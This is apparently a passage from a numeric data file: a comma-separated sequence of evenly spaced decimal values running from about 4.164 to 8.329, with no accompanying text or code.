4.164, 4.165, 4.167, 4.168, 4.169, 4.171, 4.172, 4.174, 4.175, 4.176, 4.178, 4.179, 4.181, 4.182, 4.183, 4.185, 4.186, 4.188, 4.189, 4.19, 4.192, 4.193, 4.194, 4.196, 4.197, 4.199, 4.2, 4.201, 4.203, 4.204, 4.206, 4.207, 4.208, 4.21, 4.211, 4.213, 4.214, 4.215, 4.217, 4.218, 4.219, 4.221, 4.222, 4.224, 4.225, 4.226, 4.228, 4.229, 4.231, 4.232, 4.233, 4.235, 4.236, 4.237, 4.239, 4.24, 4.242, 4.243, 4.244, 4.246, 4.247, 4.249, 4.25, 4.251, 4.253, 4.254, 4.256, 4.257, 4.258, 4.26, 4.261, 4.263, 4.264, 4.265, 4.267, 4.268, 4.269, 4.271, 4.272, 4.274, 4.275, 4.276, 4.278, 4.279, 4.281, 4.282, 4.283, 4.285, 4.286, 4.287, 4.289, 4.29, 4.292, 4.293, 4.294, 4.296, 4.297, 4.299, 4.3, 4.301, 4.303, 4.304, 4.306, 4.307, 4.308, 4.31, 4.311, 4.312, 4.314, 4.315, 4.317, 4.318, 4.319, 4.321, 4.322, 4.324, 4.325, 4.326, 4.328, 4.329, 4.331, 4.332, 4.333, 4.335, 4.336, 4.338, 4.339, 4.34, 4.342, 4.343, 4.344, 4.346, 4.347, 4.349, 4.35, 4.351, 4.353, 4.354, 4.356, 4.357, 4.358, 4.36, 4.361, 4.362, 4.364, 4.365, 4.367, 4.368, 4.369, 4.371, 4.372, 4.374, 4.375, 4.376, 4.378, 4.379, 4.381, 4.382, 4.383, 4.385, 4.386, 4.388, 4.389, 4.39, 4.392, 4.393, 4.394, 4.396, 4.397, 4.399, 4.4, 4.401, 4.403, 4.404, 4.406, 4.407, 4.408, 4.41, 4.411, 4.412, 4.414, 4.415, 4.417, 4.418, 4.419, 4.421, 4.422, 4.424, 4.425, 4.426, 4.428, 4.429, 4.431, 4.432, 4.433, 4.435, 4.436, 4.438, 4.439, 4.44, 4.442, 4.443, 4.444, 4.446, 4.447, 4.449, 4.45, 4.451, 4.453, 4.454, 4.456, 4.457, 4.458, 4.46, 4.461, 4.463, 4.464, 4.465, 4.467, 4.468, 4.469, 4.471, 4.472, 4.474, 4.475, 4.476, 4.478, 4.479, 4.481, 4.482, 4.483, 4.485, 4.486, 4.487, 4.489, 4.49, 4.492, 4.493, 4.494, 4.496, 4.497, 4.499, 4.5, 4.501, 4.503, 4.504, 4.506, 4.507, 4.508, 4.51, 4.511, 4.513, 4.514, 4.515, 4.517, 4.518, 4.519, 4.521, 4.522, 4.524, 4.525, 4.526, 4.528, 4.529, 4.531, 4.532, 4.533, 4.535, 4.536, 4.537, 4.539, 4.54, 4.542, 4.543, 4.544, 4.546, 4.547, 4.549, 4.55, 4.551, 4.553, 4.554, 4.556, 4.557, 4.558, 4.56, 4.561, 4.562, 4.564, 4.565, 4.567, 4.568, 4.569, 4.571, 4.572, 4.574, 4.575, 4.576, 4.578, 4.579, 4.581, 4.582, 4.583, 4.585, 4.586, 4.588, 4.589, 4.59, 4.592, 4.593, 4.594, 4.596, 4.597, 4.599, 4.6, 4.601, 4.603, 4.604, 4.606, 4.607, 4.608, 4.61, 4.611, 4.612, 4.614, 4.615, 4.617, 4.618, 4.619, 4.621, 4.622, 4.624, 4.625, 4.626, 4.628, 4.629, 4.631, 4.632, 4.633, 4.635, 4.636, 4.638, 4.639, 4.64, 4.642, 4.643, 4.644, 4.646, 4.647, 4.649, 4.65, 4.651, 4.653, 4.654, 4.656, 4.657, 4.658, 4.66, 4.661, 4.662, 4.664, 4.665, 4.667, 4.668, 4.669, 4.671, 4.672, 4.674, 4.675, 4.676, 4.678, 4.679, 4.681, 4.682, 4.683, 4.685, 4.686, 4.688, 4.689, 4.69, 4.692, 4.693, 4.694, 4.696, 4.697, 4.699, 4.7, 4.701, 4.703, 4.704, 4.706, 4.707, 4.708, 4.71, 4.711, 4.713, 4.714, 4.715, 4.717, 4.718, 4.719, 4.721, 4.722, 4.724, 4.725, 4.726, 4.728, 4.729, 4.731, 4.732, 4.733, 4.735, 4.736, 4.737, 4.739, 4.74, 4.742, 4.743, 4.744, 4.746, 4.747, 4.749, 4.75, 4.751, 4.753, 4.754, 4.756, 4.757, 4.758, 4.76, 4.761, 4.763, 4.764, 4.765, 4.767, 4.768, 4.769, 4.771, 4.772, 4.774, 4.775, 4.776, 4.778, 4.779, 4.781, 4.782, 4.783, 4.785, 4.786, 4.787, 4.789, 4.79, 4.792, 4.793, 4.794, 4.796, 4.797, 4.799, 4.8, 4.801, 4.803, 4.804, 4.806, 4.807, 4.808, 4.81, 4.811, 4.812, 4.814, 4.815, 4.817, 4.818, 4.819, 4.821, 4.822, 4.824, 4.825, 4.826, 4.828, 4.829, 4.831, 4.832, 4.833, 4.835, 4.836, 4.838, 4.839, 4.84, 4.842, 4.843, 4.844, 4.846, 4.847, 4.849, 4.85, 4.851, 4.853, 4.854, 4.856, 4.857, 4.858, 4.86, 4.861, 4.862, 4.864, 4.865, 4.867, 4.868, 4.869, 4.871, 4.872, 4.874, 4.875, 4.876, 4.878, 4.879, 4.881, 4.882, 4.883, 4.885, 4.886, 4.888, 4.889, 4.89, 4.892, 4.893, 4.894, 4.896, 4.897, 4.899, 4.9, 4.901, 4.903, 4.904, 4.906, 4.907, 4.908, 4.91, 4.911, 4.912, 4.914, 4.915, 4.917, 4.918, 4.919, 4.921, 4.922, 4.924, 4.925, 4.926, 4.928, 4.929, 4.931, 4.932, 4.933, 4.935, 4.936, 4.938, 4.939, 4.94, 4.942, 4.943, 4.944, 4.946, 4.947, 4.949, 4.95, 4.951, 4.953, 4.954, 4.956, 4.957, 4.958, 4.96, 4.961, 4.963, 4.964, 4.965, 4.967, 4.968, 4.969, 4.971, 4.972, 4.974, 4.975, 4.976, 4.978, 4.979, 4.981, 4.982, 4.983, 4.985, 4.986, 4.987, 4.989, 4.99, 4.992, 4.993, 4.994, 4.996, 4.997, 4.999, 5.0, 5.001, 5.003, 5.004, 5.006, 5.007, 5.008, 5.01, 5.011, 5.013, 5.014, 5.015, 5.017, 5.018, 5.019, 5.021, 5.022, 5.024, 5.025, 5.026, 5.028, 5.029, 5.031, 5.032, 5.033, 5.035, 5.036, 5.037, 5.039, 5.04, 5.042, 5.043, 5.044, 5.046, 5.047, 5.049, 5.05, 5.051, 5.053, 5.054, 5.056, 5.057, 5.058, 5.06, 5.061, 5.062, 5.064, 5.065, 5.067, 5.068, 5.069, 5.071, 5.072, 5.074, 5.075, 5.076, 5.078, 5.079, 5.081, 5.082, 5.083, 5.085, 5.086, 5.088, 5.089, 5.09, 5.092, 5.093, 5.094, 5.096, 5.097, 5.099, 5.1, 5.101, 5.103, 5.104, 5.106, 5.107, 5.108, 5.11, 5.111, 5.112, 5.114, 5.115, 5.117, 5.118, 5.119, 5.121, 5.122, 5.124, 5.125, 5.126, 5.128, 5.129, 5.131, 5.132, 5.133, 5.135, 5.136, 5.138, 5.139, 5.14, 5.142, 5.143, 5.144, 5.146, 5.147, 5.149, 5.15, 5.151, 5.153, 5.154, 5.156, 5.157, 5.158, 5.16, 5.161, 5.162, 5.164, 5.165, 5.167, 5.168, 5.169, 5.171, 5.172, 5.174, 5.175, 5.176, 5.178, 5.179, 5.181, 5.182, 5.183, 5.185, 5.186, 5.188, 5.189, 5.19, 5.192, 5.193, 5.194, 5.196, 5.197, 5.199, 5.2, 5.201, 5.203, 5.204, 5.206, 5.207, 5.208, 5.21, 5.211, 5.213, 5.214, 5.215, 5.217, 5.218, 5.219, 5.221, 5.222, 5.224, 5.225, 5.226, 5.228, 5.229, 5.231, 5.232, 5.233, 5.235, 5.236, 5.237, 5.239, 5.24, 5.242, 5.243, 5.244, 5.246, 5.247, 5.249, 5.25, 5.251, 5.253, 5.254, 5.256, 5.257, 5.258, 5.26, 5.261, 5.263, 5.264, 5.265, 5.267, 5.268, 5.269, 5.271, 5.272, 5.274, 5.275, 5.276, 5.278, 5.279, 5.281, 5.282, 5.283, 5.285, 5.286, 5.287, 5.289, 5.29, 5.292, 5.293, 5.294, 5.296, 5.297, 5.299, 5.3, 5.301, 5.303, 5.304, 5.306, 5.307, 5.308, 5.31, 5.311, 5.312, 5.314, 5.315, 5.317, 5.318, 5.319, 5.321, 5.322, 5.324, 5.325, 5.326, 5.328, 5.329, 5.331, 5.332, 5.333, 5.335, 5.336, 5.338, 5.339, 5.34, 5.342, 5.343, 5.344, 5.346, 5.347, 5.349, 5.35, 5.351, 5.353, 5.354, 5.356, 5.357, 5.358, 5.36, 5.361, 5.362, 5.364, 5.365, 5.367, 5.368, 5.369, 5.371, 5.372, 5.374, 5.375, 5.376, 5.378, 5.379, 5.381, 5.382, 5.383, 5.385, 5.386, 5.388, 5.389, 5.39, 5.392, 5.393, 5.394, 5.396, 5.397, 5.399, 5.4, 5.401, 5.403, 5.404, 5.406, 5.407, 5.408, 5.41, 5.411, 5.412, 5.414, 5.415, 5.417, 5.418, 5.419, 5.421, 5.422, 5.424, 5.425, 5.426, 5.428, 5.429, 5.431, 5.432, 5.433, 5.435, 5.436, 5.438, 5.439, 5.44, 5.442, 5.443, 5.444, 5.446, 5.447, 5.449, 5.45, 5.451, 5.453, 5.454, 5.456, 5.457, 5.458, 5.46, 5.461, 5.463, 5.464, 5.465, 5.467, 5.468, 5.469, 5.471, 5.472, 5.474, 5.475, 5.476, 5.478, 5.479, 5.481, 5.482, 5.483, 5.485, 5.486, 5.487, 5.489, 5.49, 5.492, 5.493, 5.494, 5.496, 5.497, 5.499, 5.5, 5.501, 5.503, 5.504, 5.506, 5.507, 5.508, 5.51, 5.511, 5.513, 5.514, 5.515, 5.517, 5.518, 5.519, 5.521, 5.522, 5.524, 5.525, 5.526, 5.528, 5.529, 5.531, 5.532, 5.533, 5.535, 5.536, 5.537, 5.539, 5.54, 5.542, 5.543, 5.544, 5.546, 5.547, 5.549, 5.55, 5.551, 5.553, 5.554, 5.556, 5.557, 5.558, 5.56, 5.561, 5.562, 5.564, 5.565, 5.567, 5.568, 5.569, 5.571, 5.572, 5.574, 5.575, 5.576, 5.578, 5.579, 5.581, 5.582, 5.583, 5.585, 5.586, 5.588, 5.589, 5.59, 5.592, 5.593, 5.594, 5.596, 5.597, 5.599, 5.6, 5.601, 5.603, 5.604, 5.606, 5.607, 5.608, 5.61, 5.611, 5.612, 5.614, 5.615, 5.617, 5.618, 5.619, 5.621, 5.622, 5.624, 5.625, 5.626, 5.628, 5.629, 5.631, 5.632, 5.633, 5.635, 5.636, 5.638, 5.639, 5.64, 5.642, 5.643, 5.644, 5.646, 5.647, 5.649, 5.65, 5.651, 5.653, 5.654, 5.656, 5.657, 5.658, 5.66, 5.661, 5.662, 5.664, 5.665, 5.667, 5.668, 5.669, 5.671, 5.672, 5.674, 5.675, 5.676, 5.678, 5.679, 5.681, 5.682, 5.683, 5.685, 5.686, 5.688, 5.689, 5.69, 5.692, 5.693, 5.694, 5.696, 5.697, 5.699, 5.7, 5.701, 5.703, 5.704, 5.706, 5.707, 5.708, 5.71, 5.711, 5.713, 5.714, 5.715, 5.717, 5.718, 5.719, 5.721, 5.722, 5.724, 5.725, 5.726, 5.728, 5.729, 5.731, 5.732, 5.733, 5.735, 5.736, 5.737, 5.739, 5.74, 5.742, 5.743, 5.744, 5.746, 5.747, 5.749, 5.75, 5.751, 5.753, 5.754, 5.756, 5.757, 5.758, 5.76, 5.761, 5.763, 5.764, 5.765, 5.767, 5.768, 5.769, 5.771, 5.772, 5.774, 5.775, 5.776, 5.778, 5.779, 5.781, 5.782, 5.783, 5.785, 5.786, 5.787, 5.789, 5.79, 5.792, 5.793, 5.794, 5.796, 5.797, 5.799, 5.8, 5.801, 5.803, 5.804, 5.806, 5.807, 5.808, 5.81, 5.811, 5.812, 5.814, 5.815, 5.817, 5.818, 5.819, 5.821, 5.822, 5.824, 5.825, 5.826, 5.828, 5.829, 5.831, 5.832, 5.833, 5.835, 5.836, 5.838, 5.839, 5.84, 5.842, 5.843, 5.844, 5.846, 5.847, 5.849, 5.85, 5.851, 5.853, 5.854, 5.856, 5.857, 5.858, 5.86, 5.861, 5.862, 5.864, 5.865, 5.867, 5.868, 5.869, 5.871, 5.872, 5.874, 5.875, 5.876, 5.878, 5.879, 5.881, 5.882, 5.883, 5.885, 5.886, 5.888, 5.889, 5.89, 5.892, 5.893, 5.894, 5.896, 5.897, 5.899, 5.9, 5.901, 5.903, 5.904, 5.906, 5.907, 5.908, 5.91, 5.911, 5.912, 5.914, 5.915, 5.917, 5.918, 5.919, 5.921, 5.922, 5.924, 5.925, 5.926, 5.928, 5.929, 5.931, 5.932, 5.933, 5.935, 5.936, 5.938, 5.939, 5.94, 5.942, 5.943, 5.944, 5.946, 5.947, 5.949, 5.95, 5.951, 5.953, 5.954, 5.956, 5.957, 5.958, 5.96, 5.961, 5.963, 5.964, 5.965, 5.967, 5.968, 5.969, 5.971, 5.972, 5.974, 5.975, 5.976, 5.978, 5.979, 5.981, 5.982, 5.983, 5.985, 5.986, 5.987, 5.989, 5.99, 5.992, 5.993, 5.994, 5.996, 5.997, 5.999, 6.0, 6.001, 6.003, 6.004, 6.006, 6.007, 6.008, 6.01, 6.011, 6.013, 6.014, 6.015, 6.017, 6.018, 6.019, 6.021, 6.022, 6.024, 6.025, 6.026, 6.028, 6.029, 6.031, 6.032, 6.033, 6.035, 6.036, 6.037, 6.039, 6.04, 6.042, 6.043, 6.044, 6.046, 6.047, 6.049, 6.05, 6.051, 6.053, 6.054, 6.056, 6.057, 6.058, 6.06, 6.061, 6.062, 6.064, 6.065, 6.067, 6.068, 6.069, 6.071, 6.072, 6.074, 6.075, 6.076, 6.078, 6.079, 6.081, 6.082, 6.083, 6.085, 6.086, 6.088, 6.089, 6.09, 6.092, 6.093, 6.094, 6.096, 6.097, 6.099, 6.1, 6.101, 6.103, 6.104, 6.106, 6.107, 6.108, 6.11, 6.111, 6.112, 6.114, 6.115, 6.117, 6.118, 6.119, 6.121, 6.122, 6.124, 6.125, 6.126, 6.128, 6.129, 6.131, 6.132, 6.133, 6.135, 6.136, 6.138, 6.139, 6.14, 6.142, 6.143, 6.144, 6.146, 6.147, 6.149, 6.15, 6.151, 6.153, 6.154, 6.156, 6.157, 6.158, 6.16, 6.161, 6.162, 6.164, 6.165, 6.167, 6.168, 6.169, 6.171, 6.172, 6.174, 6.175, 6.176, 6.178, 6.179, 6.181, 6.182, 6.183, 6.185, 6.186, 6.188, 6.189, 6.19, 6.192, 6.193, 6.194, 6.196, 6.197, 6.199, 6.2, 6.201, 6.203, 6.204, 6.206, 6.207, 6.208, 6.21, 6.211, 6.213, 6.214, 6.215, 6.217, 6.218, 6.219, 6.221, 6.222, 6.224, 6.225, 6.226, 6.228, 6.229, 6.231, 6.232, 6.233, 6.235, 6.236, 6.237, 6.239, 6.24, 6.242, 6.243, 6.244, 6.246, 6.247, 6.249, 6.25, 6.251, 6.253, 6.254, 6.256, 6.257, 6.258, 6.26, 6.261, 6.263, 6.264, 6.265, 6.267, 6.268, 6.269, 6.271, 6.272, 6.274, 6.275, 6.276, 6.278, 6.279, 6.281, 6.282, 6.283, 6.285, 6.286, 6.287, 6.289, 6.29, 6.292, 6.293, 6.294, 6.296, 6.297, 6.299, 6.3, 6.301, 6.303, 6.304, 6.306, 6.307, 6.308, 6.31, 6.311, 6.312, 6.314, 6.315, 6.317, 6.318, 6.319, 6.321, 6.322, 6.324, 6.325, 6.326, 6.328, 6.329, 6.331, 6.332, 6.333, 6.335, 6.336, 6.338, 6.339, 6.34, 6.342, 6.343, 6.344, 6.346, 6.347, 6.349, 6.35, 6.351, 6.353, 6.354, 6.356, 6.357, 6.358, 6.36, 6.361, 6.362, 6.364, 6.365, 6.367, 6.368, 6.369, 6.371, 6.372, 6.374, 6.375, 6.376, 6.378, 6.379, 6.381, 6.382, 6.383, 6.385, 6.386, 6.388, 6.389, 6.39, 6.392, 6.393, 6.394, 6.396, 6.397, 6.399, 6.4, 6.401, 6.403, 6.404, 6.406, 6.407, 6.408, 6.41, 6.411, 6.412, 6.414, 6.415, 6.417, 6.418, 6.419, 6.421, 6.422, 6.424, 6.425, 6.426, 6.428, 6.429, 6.431, 6.432, 6.433, 6.435, 6.436, 6.438, 6.439, 6.44, 6.442, 6.443, 6.444, 6.446, 6.447, 6.449, 6.45, 6.451, 6.453, 6.454, 6.456, 6.457, 6.458, 6.46, 6.461, 6.463, 6.464, 6.465, 6.467, 6.468, 6.469, 6.471, 6.472, 6.474, 6.475, 6.476, 6.478, 6.479, 6.481, 6.482, 6.483, 6.485, 6.486, 6.487, 6.489, 6.49, 6.492, 6.493, 6.494, 6.496, 6.497, 6.499, 6.5, 6.501, 6.503, 6.504, 6.506, 6.507, 6.508, 6.51, 6.511, 6.513, 6.514, 6.515, 6.517, 6.518, 6.519, 6.521, 6.522, 6.524, 6.525, 6.526, 6.528, 6.529, 6.531, 6.532, 6.533, 6.535, 6.536, 6.537, 6.539, 6.54, 6.542, 6.543, 6.544, 6.546, 6.547, 6.549, 6.55, 6.551, 6.553, 6.554, 6.556, 6.557, 6.558, 6.56, 6.561, 6.562, 6.564, 6.565, 6.567, 6.568, 6.569, 6.571, 6.572, 6.574, 6.575, 6.576, 6.578, 6.579, 6.581, 6.582, 6.583, 6.585, 6.586, 6.588, 6.589, 6.59, 6.592, 6.593, 6.594, 6.596, 6.597, 6.599, 6.6, 6.601, 6.603, 6.604, 6.606, 6.607, 6.608, 6.61, 6.611, 6.612, 6.614, 6.615, 6.617, 6.618, 6.619, 6.621, 6.622, 6.624, 6.625, 6.626, 6.628, 6.629, 6.631, 6.632, 6.633, 6.635, 6.636, 6.638, 6.639, 6.64, 6.642, 6.643, 6.644, 6.646, 6.647, 6.649, 6.65, 6.651, 6.653, 6.654, 6.656, 6.657, 6.658, 6.66, 6.661, 6.662, 6.664, 6.665, 6.667, 6.668, 6.669, 6.671, 6.672, 6.674, 6.675, 6.676, 6.678, 6.679, 6.681, 6.682, 6.683, 6.685, 6.686, 6.688, 6.689, 6.69, 6.692, 6.693, 6.694, 6.696, 6.697, 6.699, 6.7, 6.701, 6.703, 6.704, 6.706, 6.707, 6.708, 6.71, 6.711, 6.713, 6.714, 6.715, 6.717, 6.718, 6.719, 6.721, 6.722, 6.724, 6.725, 6.726, 6.728, 6.729, 6.731, 6.732, 6.733, 6.735, 6.736, 6.737, 6.739, 6.74, 6.742, 6.743, 6.744, 6.746, 6.747, 6.749, 6.75, 6.751, 6.753, 6.754, 6.756, 6.757, 6.758, 6.76, 6.761, 6.763, 6.764, 6.765, 6.767, 6.768, 6.769, 6.771, 6.772, 6.774, 6.775, 6.776, 6.778, 6.779, 6.781, 6.782, 6.783, 6.785, 6.786, 6.787, 6.789, 6.79, 6.792, 6.793, 6.794, 6.796, 6.797, 6.799, 6.8, 6.801, 6.803, 6.804, 6.806, 6.807, 6.808, 6.81, 6.811, 6.812, 6.814, 6.815, 6.817, 6.818, 6.819, 6.821, 6.822, 6.824, 6.825, 6.826, 6.828, 6.829, 6.831, 6.832, 6.833, 6.835, 6.836, 6.838, 6.839, 6.84, 6.842, 6.843, 6.844, 6.846, 6.847, 6.849, 6.85, 6.851, 6.853, 6.854, 6.856, 6.857, 6.858, 6.86, 6.861, 6.862, 6.864, 6.865, 6.867, 6.868, 6.869, 6.871, 6.872, 6.874, 6.875, 6.876, 6.878, 6.879, 6.881, 6.882, 6.883, 6.885, 6.886, 6.888, 6.889, 6.89, 6.892, 6.893, 6.894, 6.896, 6.897, 6.899, 6.9, 6.901, 6.903, 6.904, 6.906, 6.907, 6.908, 6.91, 6.911, 6.912, 6.914, 6.915, 6.917, 6.918, 6.919, 6.921, 6.922, 6.924, 6.925, 6.926, 6.928, 6.929, 6.931, 6.932, 6.933, 6.935, 6.936, 6.938, 6.939, 6.94, 6.942, 6.943, 6.944, 6.946, 6.947, 6.949, 6.95, 6.951, 6.953, 6.954, 6.956, 6.957, 6.958, 6.96, 6.961, 6.963, 6.964, 6.965, 6.967, 6.968, 6.969, 6.971, 6.972, 6.974, 6.975, 6.976, 6.978, 6.979, 6.981, 6.982, 6.983, 6.985, 6.986, 6.987, 6.989, 6.99, 6.992, 6.993, 6.994, 6.996, 6.997, 6.999, 7.0, 7.001, 7.003, 7.004, 7.006, 7.007, 7.008, 7.01, 7.011, 7.013, 7.014, 7.015, 7.017, 7.018, 7.019, 7.021, 7.022, 7.024, 7.025, 7.026, 7.028, 7.029, 7.031, 7.032, 7.033, 7.035, 7.036, 7.037, 7.039, 7.04, 7.042, 7.043, 7.044, 7.046, 7.047, 7.049, 7.05, 7.051, 7.053, 7.054, 7.056, 7.057, 7.058, 7.06, 7.061, 7.062, 7.064, 7.065, 7.067, 7.068, 7.069, 7.071, 7.072, 7.074, 7.075, 7.076, 7.078, 7.079, 7.081, 7.082, 7.083, 7.085, 7.086, 7.088, 7.089, 7.09, 7.092, 7.093, 7.094, 7.096, 7.097, 7.099, 7.1, 7.101, 7.103, 7.104, 7.106, 7.107, 7.108, 7.11, 7.111, 7.112, 7.114, 7.115, 7.117, 7.118, 7.119, 7.121, 7.122, 7.124, 7.125, 7.126, 7.128, 7.129, 7.131, 7.132, 7.133, 7.135, 7.136, 7.138, 7.139, 7.14, 7.142, 7.143, 7.144, 7.146, 7.147, 7.149, 7.15, 7.151, 7.153, 7.154, 7.156, 7.157, 7.158, 7.16, 7.161, 7.162, 7.164, 7.165, 7.167, 7.168, 7.169, 7.171, 7.172, 7.174, 7.175, 7.176, 7.178, 7.179, 7.181, 7.182, 7.183, 7.185, 7.186, 7.188, 7.189, 7.19, 7.192, 7.193, 7.194, 7.196, 7.197, 7.199, 7.2, 7.201, 7.203, 7.204, 7.206, 7.207, 7.208, 7.21, 7.211, 7.213, 7.214, 7.215, 7.217, 7.218, 7.219, 7.221, 7.222, 7.224, 7.225, 7.226, 7.228, 7.229, 7.231, 7.232, 7.233, 7.235, 7.236, 7.237, 7.239, 7.24, 7.242, 7.243, 7.244, 7.246, 7.247, 7.249, 7.25, 7.251, 7.253, 7.254, 7.256, 7.257, 7.258, 7.26, 7.261, 7.263, 7.264, 7.265, 7.267, 7.268, 7.269, 7.271, 7.272, 7.274, 7.275, 7.276, 7.278, 7.279, 7.281, 7.282, 7.283, 7.285, 7.286, 7.287, 7.289, 7.29, 7.292, 7.293, 7.294, 7.296, 7.297, 7.299, 7.3, 7.301, 7.303, 7.304, 7.306, 7.307, 7.308, 7.31, 7.311, 7.312, 7.314, 7.315, 7.317, 7.318, 7.319, 7.321, 7.322, 7.324, 7.325, 7.326, 7.328, 7.329, 7.331, 7.332, 7.333, 7.335, 7.336, 7.338, 7.339, 7.34, 7.342, 7.343, 7.344, 7.346, 7.347, 7.349, 7.35, 7.351, 7.353, 7.354, 7.356, 7.357, 7.358, 7.36, 7.361, 7.362, 7.364, 7.365, 7.367, 7.368, 7.369, 7.371, 7.372, 7.374, 7.375, 7.376, 7.378, 7.379, 7.381, 7.382, 7.383, 7.385, 7.386, 7.388, 7.389, 7.39, 7.392, 7.393, 7.394, 7.396, 7.397, 7.399, 7.4, 7.401, 7.403, 7.404, 7.406, 7.407, 7.408, 7.41, 7.411, 7.412, 7.414, 7.415, 7.417, 7.418, 7.419, 7.421, 7.422, 7.424, 7.425, 7.426, 7.428, 7.429, 7.431, 7.432, 7.433, 7.435, 7.436, 7.438, 7.439, 7.44, 7.442, 7.443, 7.444, 7.446, 7.447, 7.449, 7.45, 7.451, 7.453, 7.454, 7.456, 7.457, 7.458, 7.46, 7.461, 7.463, 7.464, 7.465, 7.467, 7.468, 7.469, 7.471, 7.472, 7.474, 7.475, 7.476, 7.478, 7.479, 7.481, 7.482, 7.483, 7.485, 7.486, 7.487, 7.489, 7.49, 7.492, 7.493, 7.494, 7.496, 7.497, 7.499, 7.5, 7.501, 7.503, 7.504, 7.506, 7.507, 7.508, 7.51, 7.511, 7.513, 7.514, 7.515, 7.517, 7.518, 7.519, 7.521, 7.522, 7.524, 7.525, 7.526, 7.528, 7.529, 7.531, 7.532, 7.533, 7.535, 7.536, 7.537, 7.539, 7.54, 7.542, 7.543, 7.544, 7.546, 7.547, 7.549, 7.55, 7.551, 7.553, 7.554, 7.556, 7.557, 7.558, 7.56, 7.561, 7.562, 7.564, 7.565, 7.567, 7.568, 7.569, 7.571, 7.572, 7.574, 7.575, 7.576, 7.578, 7.579, 7.581, 7.582, 7.583, 7.585, 7.586, 7.588, 7.589, 7.59, 7.592, 7.593, 7.594, 7.596, 7.597, 7.599, 7.6, 7.601, 7.603, 7.604, 7.606, 7.607, 7.608, 7.61, 7.611, 7.612, 7.614, 7.615, 7.617, 7.618, 7.619, 7.621, 7.622, 7.624, 7.625, 7.626, 7.628, 7.629, 7.631, 7.632, 7.633, 7.635, 7.636, 7.638, 7.639, 7.64, 7.642, 7.643, 7.644, 7.646, 7.647, 7.649, 7.65, 7.651, 7.653, 7.654, 7.656, 7.657, 7.658, 7.66, 7.661, 7.662, 7.664, 7.665, 7.667, 7.668, 7.669, 7.671, 7.672, 7.674, 7.675, 7.676, 7.678, 7.679, 7.681, 7.682, 7.683, 7.685, 7.686, 7.688, 7.689, 7.69, 7.692, 7.693, 7.694, 7.696, 7.697, 7.699, 7.7, 7.701, 7.703, 7.704, 7.706, 7.707, 7.708, 7.71, 7.711, 7.713, 7.714, 7.715, 7.717, 7.718, 7.719, 7.721, 7.722, 7.724, 7.725, 7.726, 7.728, 7.729, 7.731, 7.732, 7.733, 7.735, 7.736, 7.737, 7.739, 7.74, 7.742, 7.743, 7.744, 7.746, 7.747, 7.749, 7.75, 7.751, 7.753, 7.754, 7.756, 7.757, 7.758, 7.76, 7.761, 7.763, 7.764, 7.765, 7.767, 7.768, 7.769, 7.771, 7.772, 7.774, 7.775, 7.776, 7.778, 7.779, 7.781, 7.782, 7.783, 7.785, 7.786, 7.787, 7.789, 7.79, 7.792, 7.793, 7.794, 7.796, 7.797, 7.799, 7.8, 7.801, 7.803, 7.804, 7.806, 7.807, 7.808, 7.81, 7.811, 7.812, 7.814, 7.815, 7.817, 7.818, 7.819, 7.821, 7.822, 7.824, 7.825, 7.826, 7.828, 7.829, 7.831, 7.832, 7.833, 7.835, 7.836, 7.838, 7.839, 7.84, 7.842, 7.843, 7.844, 7.846, 7.847, 7.849, 7.85, 7.851, 7.853, 7.854, 7.856, 7.857, 7.858, 7.86, 7.861, 7.862, 7.864, 7.865, 7.867, 7.868, 7.869, 7.871, 7.872, 7.874, 7.875, 7.876, 7.878, 7.879, 7.881, 7.882, 7.883, 7.885, 7.886, 7.888, 7.889, 7.89, 7.892, 7.893, 7.894, 7.896, 7.897, 7.899, 7.9, 7.901, 7.903, 7.904, 7.906, 7.907, 7.908, 7.91, 7.911, 7.912, 7.914, 7.915, 7.917, 7.918, 7.919, 7.921, 7.922, 7.924, 7.925, 7.926, 7.928, 7.929, 7.931, 7.932, 7.933, 7.935, 7.936, 7.938, 7.939, 7.94, 7.942, 7.943, 7.944, 7.946, 7.947, 7.949, 7.95, 7.951, 7.953, 7.954, 7.956, 7.957, 7.958, 7.96, 7.961, 7.963, 7.964, 7.965, 7.967, 7.968, 7.969, 7.971, 7.972, 7.974, 7.975, 7.976, 7.978, 7.979, 7.981, 7.982, 7.983, 7.985, 7.986, 7.987, 7.989, 7.99, 7.992, 7.993, 7.994, 7.996, 7.997, 7.999, 8.0, 8.001, 8.003, 8.004, 8.006, 8.007, 8.008, 8.01, 8.011, 8.012, 8.014, 8.015, 8.017, 8.018, 8.019, 8.021, 8.022, 8.024, 8.025, 8.026, 8.028, 8.029, 8.031, 8.032, 8.033, 8.035, 8.036, 8.037, 8.039, 8.04, 8.042, 8.043, 8.044, 8.046, 8.047, 8.049, 8.05, 8.051, 8.053, 8.054, 8.056, 8.057, 8.058, 8.06, 8.061, 8.062, 8.064, 8.065, 8.067, 8.068, 8.069, 8.071, 8.072, 8.074, 8.075, 8.076, 8.078, 8.079, 8.081, 8.082, 8.083, 8.085, 8.086, 8.088, 8.089, 8.09, 8.092, 8.093, 8.094, 8.096, 8.097, 8.099, 8.1, 8.101, 8.103, 8.104, 8.106, 8.107, 8.108, 8.11, 8.111, 8.113, 8.114, 8.115, 8.117, 8.118, 8.119, 8.121, 8.122, 8.124, 8.125, 8.126, 8.128, 8.129, 8.131, 8.132, 8.133, 8.135, 8.136, 8.137, 8.139, 8.14, 8.142, 8.143, 8.144, 8.146, 8.147, 8.149, 8.15, 8.151, 8.153, 8.154, 8.156, 8.157, 8.158, 8.16, 8.161, 8.162, 8.164, 8.165, 8.167, 8.168, 8.169, 8.171, 8.172, 8.174, 8.175, 8.176, 8.178, 8.179, 8.181, 8.182, 8.183, 8.185, 8.186, 8.188, 8.189, 8.19, 8.192, 8.193, 8.194, 8.196, 8.197, 8.199, 8.2, 8.201, 8.203, 8.204, 8.206, 8.207, 8.208, 8.21, 8.211, 8.213, 8.214, 8.215, 8.217, 8.218, 8.219, 8.221, 8.222, 8.224, 8.225, 8.226, 8.228, 8.229, 8.231, 8.232, 8.233, 8.235, 8.236, 8.238, 8.239, 8.24, 8.242, 8.243, 8.244, 8.246, 8.247, 8.249, 8.25, 8.251, 8.253, 8.254, 8.256, 8.257, 8.258, 8.26, 8.261, 8.262, 8.264, 8.265, 8.267, 8.268, 8.269, 8.271, 8.272, 8.274, 8.275, 8.276, 8.278, 8.279, 8.281, 8.282, 8.283, 8.285, 8.286, 8.287, 8.289, 8.29, 8.292, 8.293, 8.294, 8.296, 8.297, 8.299, 8.3, 8.301, 8.303, 8.304, 8.306, 8.307, 8.308, 8.31, 8.311, 8.312, 8.314, 8.315, 8.317, 8.318, 8.319, 8.321, 8.322, 8.324, 8.325, 8.326, 8.328, 8.329, 